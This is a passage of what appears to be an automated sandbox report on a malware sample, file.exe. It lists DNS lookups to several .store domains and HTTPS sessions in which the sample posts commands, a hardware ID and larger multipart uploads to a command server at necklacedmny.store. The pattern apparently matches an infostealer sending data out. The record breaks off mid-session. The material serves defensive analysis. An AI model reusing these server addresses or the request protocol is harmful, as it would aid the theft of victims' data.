Oct 30, 2024 23:11:51.392401934 CET	53	56153	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 30, 2024 23:11:09.458592892 CET	192.168.2.6	1.1.1.1	0x4bd7	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Oct 30, 2024 23:11:09.481914043 CET	192.168.2.6	1.1.1.1	0x9e1	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Oct 30, 2024 23:11:09.543050051 CET	192.168.2.6	1.1.1.1	0x4747	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Oct 30, 2024 23:11:09.555540085 CET	192.168.2.6	1.1.1.1	0x7c1e	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Oct 30, 2024 23:11:09.570431948 CET	192.168.2.6	1.1.1.1	0x5078	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 30, 2024 23:11:09.469336987 CET	1.1.1.1	192.168.2.6	0x4bd7	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Oct 30, 2024 23:11:09.493012905 CET	1.1.1.1	192.168.2.6	0x9e1	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Oct 30, 2024 23:11:09.554214954 CET	1.1.1.1	192.168.2.6	0x4747	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 30, 2024 23:11:09.565938950 CET	1.1.1.1	192.168.2.6	0x7c1e	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 30, 2024 23:11:09.586196899 CET	1.1.1.1	192.168.2.6	0x5078	No error (0)	necklacedmny.store		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 23:11:09.586196899 CET	1.1.1.1	192.168.2.6	0x5078	No error (0)	necklacedmny.store		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

necklacedmny.store

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	188.114.97.3	443	4872	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 22:11:10 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: necklacedmny.store
2024-10-30 22:11:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-30 22:11:10 UTC	1023	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 22:11:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=15i542upr8g40s4bpd677vtq2p; expires=Sun, 23-Feb-2025 15:57:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2Budh7aR8%2BmG8c1M8leO2a1hEFSwWirdYRpUQHZvnfkS%2FsNa9A%2B%2Fv0jtrsDuQ2oB8w63yN%2BPJWUhxASFCtB5Elkz57S3qQQtj1sh9siAM1ncIzA%2BISmQdO3YOdo0xz%2FSKsSRu0k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8daebd568d4c0b82-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2401&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1220910&cwnd=251&unsent_bytes=0&cid=57366b538c767f07&ts=690&x=0"
2024-10-30 22:11:10 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-30 22:11:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49711	188.114.97.3	443	4872	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 22:11:11 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: necklacedmny.store
2024-10-30 22:11:11 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-30 22:11:12 UTC	1017	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 22:11:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=le3eeumqv4r3ecbjluiqtfuvvk; expires=Sun, 23-Feb-2025 15:57:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Hm8lmqGA7iRo3k373dhbtHrJd2cJdORvn5O6%2BhUNmIxiVsWTd2yCcpPSYTpWUlbzcH8vH03zvXdkI6bY9fqNy%2BEkYDYtRg%2BWkjz%2BOALd%2FM9wvYuNX2gfm4D1rc8rVHSqmRaeto%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8daebd5dcdff4786-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1123&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=2366013&cwnd=234&unsent_bytes=0&cid=728dbf60df70f204&ts=695&x=0"
2024-10-30 22:11:12 UTC	352	IN	Data Raw: 32 64 63 63 0d 0a 61 37 33 6c 6a 32 41 44 47 37 50 61 62 4d 6f 36 38 6a 65 62 66 7a 66 71 35 63 66 76 4c 69 41 63 78 38 55 4a 79 55 44 48 33 36 59 51 6e 35 4f 74 57 6a 63 33 6b 61 6b 4a 36 41 43 47 52 65 34 61 47 38 69 45 6f 38 30 55 52 6e 32 72 74 6d 7a 6c 59 72 47 79 68 46 48 62 68 4f 4d 54 5a 6a 65 52 76 78 54 6f 41 4b 6c 4d 75 52 70 5a 79 4e 2f 6c 69 6b 52 43 66 61 75 6e 61 4b 49 76 74 37 50 46 41 39 47 43 35 77 56 67 66 39 4b 32 41 61 39 66 6c 31 62 78 45 56 36 48 6a 61 72 4e 41 67 4a 35 76 65 63 7a 36 77 32 69 71 38 63 6d 33 4a 62 6b 51 6e 34 33 79 50 67 4a 70 42 6a 49 46 66 6f 61 56 59 61 44 6f 34 52 47 53 48 53 6a 70 6d 32 6a 4d 4b 36 35 7a 67 50 66 67 65 59 50 61 57 76 66 76 41 61 6b 57 5a 31 57 75 56 4d 56 6a 35 2f 6c 31 51 77 52 54 4b 61 32 65 Data Ascii: 2dcca73lj2ADG7PabMo68jebfzfq5cfvLiAcx8UJyUDH36YQn5OtWjc3kakJ6ACGRe4aG8iEo80URn2rtmzlYrGyhFHbhOMTZjeRvxToAKlMuRpZyN/likRCfaunaKIvt7PFA9GC5wVgf9K2Aa9fl1bxEV6HjarNAgJ5vecz6w2iq8cm3JbkQn43yPgJpBjIFfoaVYaDo4RGSHSjpm2jMK65zgPfgeYPaWvfvAakWZ1WuVMVj5/l1QwRTKa2e
2024-10-30 22:11:12 UTC	1369	IN	Data Raw: 4d 44 62 48 6e 44 73 41 57 6a 58 59 4a 65 38 42 42 59 69 49 71 76 67 6b 39 43 65 61 2b 74 5a 4b 45 6d 71 4c 44 43 43 64 2f 48 6f 30 4a 6d 59 5a 48 67 54 6f 74 64 67 46 4c 31 43 78 65 79 78 37 72 44 56 51 4a 35 71 65 63 7a 36 79 71 67 76 73 63 43 30 49 54 6c 43 58 4e 35 77 37 34 44 72 55 71 57 55 50 63 58 56 70 71 4e 71 34 74 50 53 33 57 73 6f 6d 79 76 59 75 76 39 77 78 47 66 33 36 30 6a 62 48 4c 64 73 68 6d 6f 47 49 38 62 34 46 31 53 68 4d 66 39 7a 55 68 44 65 71 53 6a 5a 61 55 6d 71 62 76 4b 42 4e 43 42 35 77 4a 6d 63 39 6d 77 44 36 56 54 6e 31 58 38 45 46 47 4f 69 36 53 49 44 41 77 2b 6f 72 38 72 38 32 4b 4c 75 73 63 62 6e 62 4c 75 44 47 39 2b 78 2f 67 52 35 6b 48 51 55 76 56 64 44 63 69 4a 6f 49 4a 65 51 32 79 67 71 58 6d 6e 4a 36 4f 77 78 77 66 66 67 Data Ascii: MDbHnDsAWjXYJe8BBYiIqvgk9Cea+tZKEmqLDCCd/Ho0JmYZHgTotdgFL1Cxeyx7rDVQJ5qecz6yqgvscC0ITlCXN5w74DrUqWUPcXVpqNq4tPS3WsomyvYuv9wxGf360jbHLdshmoGI8b4F1ShMf9zUhDeqSjZaUmqbvKBNCB5wJmc9mwD6VTn1X8EFGOi6SIDAw+or8r82KLuscbnbLuDG9+x/gR5kHQUvVdDciJoIJeQ2ygqXmnJ6Owxwffg
2024-10-30 22:11:12 UTC	1369	IN	Data Raw: 2b 78 2f 67 52 35 6b 48 51 55 76 56 64 44 63 69 4c 72 49 31 48 53 48 71 6c 6f 47 61 75 49 61 4b 2b 79 51 37 56 69 65 6f 47 62 58 44 63 76 67 36 76 58 4a 56 48 2f 42 52 5a 68 4d 66 72 7a 55 74 61 50 76 33 6e 52 4b 77 30 70 70 4c 48 47 4e 62 48 38 6b 78 34 4f 64 61 30 54 76 41 59 6c 31 44 78 46 6c 4f 41 68 37 65 49 51 6b 6c 2f 72 36 46 71 70 69 36 6a 76 63 55 4a 32 59 76 74 42 57 5a 72 77 37 30 49 75 6c 4c 51 47 37 6b 61 54 63 6a 66 35 62 74 63 56 57 2b 7a 35 56 36 6f 4c 4b 75 36 30 6b 6e 41 79 66 52 43 5a 6e 57 52 34 45 36 6a 57 4a 78 53 38 52 74 52 67 49 69 71 68 46 35 44 63 71 75 31 62 4b 73 72 71 37 4c 49 41 4e 4b 41 34 41 6c 72 64 4e 57 2f 44 2b 67 57 30 46 4c 68 58 51 33 49 73 62 57 41 51 47 78 31 71 61 34 72 74 47 79 38 2f 63 4d 46 6e 39 2b 74 42 6d Data Ascii: +x/gR5kHQUvVdDciLrI1HSHqloGauIaK+yQ7VieoGbXDcvg6vXJVH/BRZhMfrzUtaPv3nRKw0ppLHGNbH8kx4Oda0TvAYl1DxFlOAh7eIQkl/r6Fqpi6jvcUJ2YvtBWZrw70IulLQG7kaTcjf5btcVW+z5V6oLKu60knAyfRCZnWR4E6jWJxS8RtRgIiqhF5Dcqu1bKsrq7LIANKA4AlrdNW/D+gW0FLhXQ3IsbWAQGx1qa4rtGy8/cMFn9+tBm
2024-10-30 22:11:12 UTC	1369	IN	Data Raw: 43 71 31 64 6c 46 4c 39 47 31 72 49 79 65 57 4b 56 41 49 6d 35 59 68 4d 6e 6d 43 45 68 34 51 57 6b 5a 36 74 42 57 30 35 69 66 67 43 71 31 53 59 57 76 38 55 57 59 4b 4f 72 6f 46 48 52 6e 4b 73 6f 6d 32 71 4a 36 43 38 77 41 58 56 67 65 34 42 62 6e 62 65 73 45 37 6d 47 4a 64 4e 75 55 55 56 72 5a 43 75 67 30 6f 43 59 65 75 2b 4b 36 77 75 35 65 57 45 42 64 61 42 36 77 64 74 65 4e 65 77 43 36 42 63 6b 56 50 2f 48 6c 71 4d 67 71 53 43 53 45 35 77 72 36 5a 71 70 79 6d 71 74 73 46 4a 6b 63 66 71 47 69 45 68 6b 59 6b 4e 76 6b 2b 41 57 62 6b 43 47 35 48 48 6f 6f 45 4d 47 6a 36 6b 74 57 47 68 4c 4b 43 79 77 51 72 51 67 4f 41 45 62 58 50 59 73 41 69 6e 55 59 4a 57 39 52 4e 53 68 6f 75 72 67 45 5a 42 63 2b 58 70 4b 36 77 36 35 65 57 45 4a 64 69 4b 77 77 6c 74 66 70 47 Data Ascii: Cq1dlFL9G1rIyeWKVAIm5YhMnmCEh4QWkZ6tBW05ifgCq1SYWv8UWYKOroFHRnKsom2qJ6C8wAXVge4BbnbesE7mGJdNuUUVrZCug0oCYeu+K6wu5eWEBdaB6wdteNewC6BckVP/HlqMgqSCSE5wr6ZqpymqtsFJkcfqGiEhkYkNvk+AWbkCG5HHooEMGj6ktWGhLKCywQrQgOAEbXPYsAinUYJW9RNShourgEZBc+XpK6w65eWEJdiKwwltfpG
2024-10-30 22:11:12 UTC	1369	IN	Data Raw: 4e 34 56 2f 67 55 56 30 4d 65 54 69 6c 78 53 66 65 65 57 66 61 67 30 72 72 44 49 53 63 44 4a 39 45 4a 6d 64 5a 48 67 54 71 35 58 6d 56 62 32 48 46 79 45 69 71 43 45 53 55 4e 34 6f 61 31 68 71 79 53 6a 76 4d 45 44 33 49 62 6e 43 32 5a 78 31 72 73 63 36 42 62 51 55 75 46 64 44 63 69 75 6f 70 39 43 55 6a 36 36 36 58 4c 72 4a 61 6e 39 6e 45 6e 62 6a 65 49 47 5a 6e 58 58 76 51 69 6c 57 5a 39 55 2b 52 4a 52 67 34 36 6a 6a 45 46 48 63 36 47 31 59 61 41 74 71 62 54 49 42 4a 2f 4a 72 51 56 35 4f 59 6e 34 50 36 56 57 6e 6c 4c 76 58 55 72 47 6e 75 57 4b 51 41 49 6d 35 61 5a 6e 70 43 47 71 76 73 63 49 31 5a 58 2f 44 6d 68 78 31 4c 51 46 70 6c 36 43 55 2f 59 55 56 6f 75 4f 6f 6f 56 41 53 48 32 69 35 79 58 72 4a 62 33 39 6e 45 6e 38 6b 50 30 50 49 57 61 66 6f 55 36 76 Data Ascii: N4V/gUV0MeTilxSfeeWfag0rrDIScDJ9EJmdZHgTq5XmVb2HFyEiqCESUN4oa1hqySjvMED3IbnC2Zx1rsc6BbQUuFdDciuop9CUj666XLrJan9nEnbjeIGZnXXvQilWZ9U+RJRg46jjEFHc6G1YaAtqbTIBJ/JrQV5OYn4P6VWnlLvXUrGnuWKQAIm5aZnpCGqvscI1ZX/Dmhx1LQFpl6CU/YUVouOooVASH2i5yXrJb39nEn8kP0PIWafoU6v
2024-10-30 22:11:12 UTC	1369	IN	Data Raw: 38 54 52 34 32 42 71 6f 4a 46 53 33 71 74 70 47 75 76 4a 71 4b 34 78 77 58 55 67 4f 34 4e 5a 58 44 66 73 51 48 6f 46 74 42 53 34 56 30 4e 79 4b 61 2b 6a 6b 42 50 50 72 72 70 63 75 73 6c 71 66 32 63 53 64 4f 4a 36 41 4a 72 66 39 57 39 43 4b 4a 64 6b 46 37 36 45 6c 47 4f 67 36 71 4e 52 30 74 2f 6f 36 4a 68 6f 43 53 6f 76 73 49 50 6e 38 6d 74 42 58 6b 35 69 66 67 75 73 31 57 63 55 72 6b 43 47 35 48 48 6f 6f 45 4d 47 6a 36 75 71 32 2b 73 49 71 69 2b 7a 41 7a 62 6a 65 67 43 61 57 76 5a 75 41 6d 36 53 70 42 63 2f 42 46 57 69 49 4f 6a 68 45 70 42 65 75 58 70 4b 36 77 36 35 65 57 45 4a 4e 4f 41 78 41 56 36 4f 63 37 32 46 2b 68 66 6e 42 57 68 58 56 53 44 6a 61 71 41 54 30 52 39 72 71 4a 68 71 69 57 74 73 4e 59 4b 30 49 6a 70 41 6d 35 2f 31 37 6b 42 72 6c 2b 5a 56 Data Ascii: 8TR42BqoJFS3qtpGuvJqK4xwXUgO4NZXDfsQHoFtBS4V0NyKa+jkBPPrrpcuslqf2cSdOJ6AJrf9W9CKJdkF76ElGOg6qNR0t/o6JhoCSovsIPn8mtBXk5ifgus1WcUrkCG5HHooEMGj6uq2+sIqi+zAzbjegCaWvZuAm6SpBc/BFWiIOjhEpBeuXpK6w65eWEJNOAxAV6Oc72F+hfnBWhXVSDjaqAT0R9rqJhqiWtsNYK0IjpAm5/17kBrl+ZV
2024-10-30 22:11:12 UTC	1369	IN	Data Raw: 50 75 5a 75 71 57 6b 68 35 74 61 42 38 70 47 4c 72 2f 63 74 4a 68 37 36 74 43 32 5a 69 77 4b 34 44 75 46 2f 51 61 72 64 64 54 63 6a 66 35 62 68 50 54 48 43 69 73 58 72 6d 42 62 4f 33 77 78 6e 59 6b 4f 4a 43 4c 7a 6e 58 2b 46 62 37 46 74 42 52 36 46 30 4e 32 4e 58 2b 32 42 38 56 4c 76 65 34 4a 62 4a 69 73 2f 32 63 57 35 48 48 2f 30 49 35 4f 5a 61 37 48 4c 70 65 6b 30 50 36 57 6d 75 32 6f 4c 2b 41 53 6c 56 76 6d 35 6c 73 73 53 2b 6a 71 74 56 46 79 6f 54 6a 44 47 5a 76 6b 66 5a 4f 70 78 6a 49 62 4c 6c 56 46 62 66 4a 35 5a 55 4d 47 6a 36 51 70 47 57 6c 4a 62 4f 73 69 53 37 46 69 75 73 56 63 44 6d 66 2b 41 6a 6f 41 4d 41 62 75 52 6c 45 79 4e 2f 31 33 78 63 58 4c 66 4c 33 4f 62 52 73 76 50 33 53 53 59 66 56 6f 30 4a 7a 4f 59 6e 34 53 61 74 4b 67 6c 50 36 43 31 Data Ascii: PuZuqWkh5taB8pGLr/ctJh76tC2ZiwK4DuF/QarddTcjf5bhPTHCisXrmBbO3wxnYkOJCLznX+Fb7FtBR6F0N2NX+2B8VLve4JbJis/2cW5HH/0I5OZa7HLpek0P6Wmu2oL+ASlVvm5lssS+jqtVFyoTjDGZvkfZOpxjIbLlVFbfJ5ZUMGj6QpGWlJbOsiS7FiusVcDmf+AjoAMAbuRlEyN/13xcXLfL3ObRsvP3SSYfVo0JzOYn4SatKglP6C1
2024-10-30 22:11:12 UTC	1369	IN	Data Raw: 7a 52 51 43 53 36 61 70 5a 61 77 30 74 50 44 6a 42 39 69 47 2b 78 4a 32 64 70 48 32 54 71 34 59 79 41 65 33 58 56 47 5a 78 2f 33 64 48 68 6b 72 39 76 41 37 2b 54 33 72 70 49 51 66 6e 39 2b 2f 54 43 46 72 6b 65 42 4f 37 31 75 43 52 2f 38 65 51 34 76 41 6d 37 4e 72 54 48 6d 6b 73 58 75 38 4c 65 71 54 38 69 6a 68 75 66 67 42 62 33 66 57 72 68 2f 6f 46 74 42 61 75 55 56 73 79 4d 2f 6c 73 67 49 43 5a 75 58 2f 4b 35 34 68 71 37 50 44 48 38 37 4b 79 67 78 6d 65 4d 65 6f 47 61 63 58 76 6d 50 59 58 52 76 49 67 65 58 56 48 67 77 2b 6f 62 59 72 38 33 4c 33 35 70 46 61 69 4e 65 2f 48 53 39 67 6b 61 35 4f 38 41 72 65 46 65 74 64 44 63 6a 41 70 70 39 65 52 48 32 7a 70 43 79 56 48 49 4b 7a 77 77 6a 4a 6c 2b 41 4f 51 48 72 41 73 6a 43 57 54 5a 4e 62 39 78 70 44 6d 63 66 Data Ascii: zRQCS6apZaw0tPDjB9iG+xJ2dpH2Tq4YyAe3XVGZx/3dHhkr9vA7+T3rpIQfn9+/TCFrkeBO71uCR/8eQ4vAm7NrTHmksXu8LeqT8ijhufgBb3fWrh/oFtBauUVsyM/lsgICZuX/K54hq7PDH87KygxmeMeoGacXvmPYXRvIgeXVHgw+obYr83L35pFaiNe/HS9gka5O8AreFetdDcjApp9eRH2zpCyVHIKzwwjJl+AOQHrAsjCWTZNb9xpDmcf
2024-10-30 22:11:12 UTC	1369	IN	Data Raw: 33 4f 68 73 58 36 6f 4d 71 4b 44 2b 69 54 4e 67 50 30 42 49 31 58 57 74 51 4b 57 5a 71 64 45 2f 67 30 58 72 6f 53 7a 6a 67 77 4d 50 72 33 6e 4d 2b 73 50 74 37 72 55 43 70 32 72 36 67 39 74 4f 63 37 32 46 2b 68 4f 30 41 32 71 55 78 57 61 78 2f 33 4e 43 30 46 73 74 36 46 6f 76 53 48 69 67 2f 6f 6b 7a 59 44 39 41 53 4e 49 33 4c 77 59 76 56 75 41 55 73 63 6a 65 4a 71 41 74 59 34 4f 5a 30 54 6e 6c 6e 32 6f 49 71 75 36 68 45 65 66 6e 36 31 61 49 56 54 44 76 78 36 72 47 72 56 76 75 79 78 44 69 34 65 72 69 67 78 64 4d 4c 7a 6e 66 65 74 36 39 76 4f 45 47 35 2f 66 72 55 56 76 64 4e 43 37 41 4b 74 4b 67 6c 50 36 43 31 62 50 75 5a 75 69 52 30 4e 75 71 4c 5a 6d 72 7a 53 62 67 2b 4d 50 32 6f 44 54 50 46 5a 6f 31 71 68 4d 6a 6c 75 47 56 72 6c 54 46 5a 44 48 2f 63 31 72 Data Ascii: 3OhsX6oMqKD+iTNgP0BI1XWtQKWZqdE/g0XroSzjgwMPr3nM+sPt7rUCp2r6g9tOc72F+hO0A2qUxWax/3NC0Fst6FovSHig/okzYD9ASNI3LwYvVuAUscjeJqAtY4OZ0Tnln2oIqu6hEefn61aIVTDvx6rGrVvuyxDi4erigxdMLznfet69vOEG5/frUVvdNC7AKtKglP6C1bPuZuiR0NuqLZmrzSbg+MP2oDTPFZo1qhMjluGVrlTFZDH/c1r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49712	188.114.97.3	443	4872	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 22:11:13 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12864 Host: necklacedmny.store
2024-10-30 22:11:13 UTC	12864	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 39 44 30 41 43 34 45 30 46 34 36 41 44 32 36 42 43 42 38 34 41 44 36 38 45 36 43 34 42 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E89D0AC4E0F46AD26BCB84AD68E6C4B4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-30 22:11:13 UTC	1020	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 22:11:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bnjiip6ksp4lje3i3qui7adqem; expires=Sun, 23-Feb-2025 15:57:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fj92l1snTMw9EqxYS0ssE24q8U8LZ%2FHbjC3X%2BgSHJD1EiiGEbNK1h4fcVIiIhSmaSynS%2BT%2Fiz6D107%2BXpsSIC4ASlQczdaT9iJmU7rNMGC0yR31HKSsTjiWiSDCTZyueakskXow%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8daebd676f3fe843-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1383&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13806&delivery_rate=2056818&cwnd=251&unsent_bytes=0&cid=f3afd0c58497cfb0&ts=542&x=0"
2024-10-30 22:11:13 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a Data Ascii: 11ok 173.254.250.78
2024-10-30 22:11:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49713	188.114.97.3	443	4872	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 22:11:14 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15110 Host: necklacedmny.store
2024-10-30 22:11:14 UTC	15110	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 39 44 30 41 43 34 45 30 46 34 36 41 44 32 36 42 43 42 38 34 41 44 36 38 45 36 43 34 42 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E89D0AC4E0F46AD26BCB84AD68E6C4B4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-30 22:11:15 UTC	1016	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 22:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=29jsgqoo5eusc800epcj6ag942; expires=Sun, 23-Feb-2025 15:57:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7V2x%2BYEO1bKerMm4kT4Fx3nnUyOB8pGfGUSmmZs3ocjYvr%2Fy%2FvxneugD1iHOWnUT8PuEo8wrCiFIEkKGFViHk0nBQWKrQANrmB3IY0n5q1mcXJwK1KOvBNofPwKvDiglz4STc0I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8daebd6fbc6e2cac-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1418&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16052&delivery_rate=1861182&cwnd=232&unsent_bytes=0&cid=cba997da97fe6fe7&ts=772&x=0"
2024-10-30 22:11:15 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a Data Ascii: 11ok 173.254.250.78
2024-10-30 22:11:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49714	188.114.97.3	443	4872	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 22:11:16 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19968 Host: necklacedmny.store
